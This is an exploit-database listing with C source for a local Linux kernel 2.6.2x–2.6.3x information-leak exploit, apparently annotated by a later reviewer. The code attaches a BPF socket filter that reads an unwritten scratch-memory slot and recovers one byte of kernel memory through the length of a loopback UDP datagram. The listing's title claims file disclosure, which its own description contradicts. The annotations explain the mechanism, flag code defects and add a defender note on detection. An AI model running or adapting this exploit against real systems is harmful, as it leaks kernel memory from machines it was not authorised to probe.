Linux Kernel 2.6.2* - 2.6.3* Local Files Disclosure

2011-10-02T00:00:00
ID 1337DAY-ID-17186
Type zdt
Reporter CrosS
Modified 2011-10-02T00:00:00

Description

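Local exploit for the Linux platform. Despite the title, the listing below does not read files: it attaches a socket filter whose first instruction loads from a filter scratch-memory slot that the program never stored to, and it reports one byte of whatever that slot held.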

                                        


/*
 * Local File Disclosure 
 * Linux Kernel 2.6.2* - 2.6.3* 
 * By        > CrosS
 * Greetz    > r0073r , r4dc0re , Side^effects(1337day.com)
 *                       Ataman , S4(uR4 , Xenu(r00tw0rm.com) 
 */
 
#include <string.h>
#include <stdio.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <linux/filter.h>
 
#define PORT 37337
 
/*
 * transfer - send one 512-byte datagram over loopback and report how many
 * bytes the receiving socket hands back.
 *
 * sendsock: UDP socket the forked child sends from.
 * recvsock: UDP socket the parent reads from; main() binds it to PORT and
 *           attaches a socket filter to it before calling this function.
 *
 * Returns the recvfrom() result in the parent. The child never returns to the
 * caller; it calls exit(0) after sending. The payload is all zero bytes and is
 * never inspected: only the received length carries information.
 */
int transfer(int sendsock, int recvsock)
{
 
    struct sockaddr_in addr;
    char buf[512];
    /* NOTE(review): recvfrom() takes a socklen_t * for the address length;
     * the address of an int is passed below. */
    int len = sizeof(addr);
 
    memset(buf, 0, sizeof(buf));
     
    /* Parent path: block until the datagram arrives. fork() failure (-1) is
     * also non-zero, so it takes this path too and would wait with no sender. */
    if (fork())
        return recvfrom(recvsock, buf, 512, 0, (struct sockaddr *)&addr, &len);
 
    /* Child path: presumably the delay lets the parent reach recvfrom() first. */
    sleep(1);
 
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    /* NOTE(review): no <arpa/inet.h> include is visible in this listing for
     * inet_addr() - confirm how it is declared. */
    addr.sin_addr.s_addr = inet_addr("127.0.0.1");
     
    /* Return value is ignored; a failed send leaves the parent waiting. */
    sendto(sendsock, buf, 512, 0, (struct sockaddr *)&addr, len);
 
    /* End the child here so it never continues into main()'s printf. */
    exit(0);
 
}
 
/*
 * main - attach a five-instruction classic BPF socket filter to a loopback
 * UDP socket and print one byte derived from the length of the datagram the
 * filter lets through.
 *
 * argv[1] is a byte offset 0-63, i.e. a byte inside one of 16 four-byte
 * filter scratch-memory words (word index = offset / 4).
 *
 * The filter reads a scratch word without ever storing to it, so the value it
 * sees is whatever that slot already contained. The byte is then encoded in
 * the filter's return value, which for a socket filter is the number of
 * packet bytes to accept, and recovered from the recvfrom() length.
 *
 * Defender note: a filter whose first instruction is BPF_LD|BPF_MEM with no
 * earlier store to that slot has no ordinary use. A kernel that zeroes the
 * scratch array, or rejects loads from unwritten slots when the filter is
 * attached, makes this program report a constant or fail at setsockopt().
 *
 * Returns -1 on usage or setup errors; there is no explicit return on the
 * success path.
 */
int main(int argc, char * argv[])
{
 
    int sendsock, recvsock, ret;
    unsigned int val;  
    struct sockaddr_in addr;
    struct sock_fprog fprog;
    struct sock_filter filters[5];
 
    if (argc != 2) {
        printf("[*] Usage: %s offset (0-63)\n", argv[0]);
        return -1;
    }
 
    /* atoi() reports no errors: non-numeric input yields 0, and a negative
     * number converts to a large unsigned value that the range check rejects. */
    val = atoi(argv[1]);
 
    if (val > 63) {
        printf("[*] Inv4liD by7e oFfs3t (must be 0-63)\n");
        return -1;
    }
 
    recvsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    sendsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
 
    if (recvsock < 0 || sendsock < 0) {
        printf("[*] CoulD no7 Cre4t3 soCke7s.\n");
        return -1;
    }
 
    /* Receiver listens on PORT on all interfaces; transfer() sends to
     * 127.0.0.1 on the same port. */
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
 
    if (bind(recvsock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        printf("[*] CoulD no7 biNd soCke7.\n");
        return -1;
    }
 
    memset(&fprog, 0, sizeof(fprog));
    memset(filters, 0, sizeof(filters));
 
    /* [0] A = scratch word (val / 4). No instruction in this program stores
     * to scratch memory first, so this reads a slot the filter never wrote. */
    filters[0].code = BPF_LD|BPF_MEM;
    filters[0].k = (val & ~0x3) / 4;
 
    /* [1] Keep only the selected byte of that word. */
    filters[1].code = BPF_ALU|BPF_AND|BPF_K;
    filters[1].k = 0xff << ((val % 4) * 8);
 
    /* [2] Shift the selected byte down into the low 8 bits. */
    filters[2].code = BPF_ALU|BPF_RSH|BPF_K;
    filters[2].k = (val % 4) * 8;
 
    /* [3] Add 256 so the accept length is non-zero even when the byte is 0. */
    filters[3].code = BPF_ALU|BPF_ADD|BPF_K;
    filters[3].k = 256;
 
    /* [4] Return A: accept (256 + byte) bytes of the packet, drop the rest. */
    filters[4].code = BPF_RET|BPF_A;
 
    fprog.len = 5;
    fprog.filter = filters;
 
    if (setsockopt(recvsock, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog)) < 0) {
        printf("[*] F41leD 7o 1nstaLl fiLteR y0u m0f0 h3aD.\n");
        return -1;
    }
 
    /* ret is the length recvfrom() reported for the filtered datagram. A
     * recvfrom() error (-1) is not checked before the subtraction below. */
    ret = transfer(sendsock, recvsock);
 
    /* 248 is presumably 256 minus the 8-byte UDP header that the filter's
     * accept length includes - confirm against the target kernel. */
    printf("[*] Your byte: 0x%.02x\n", ret - 248);
 
}


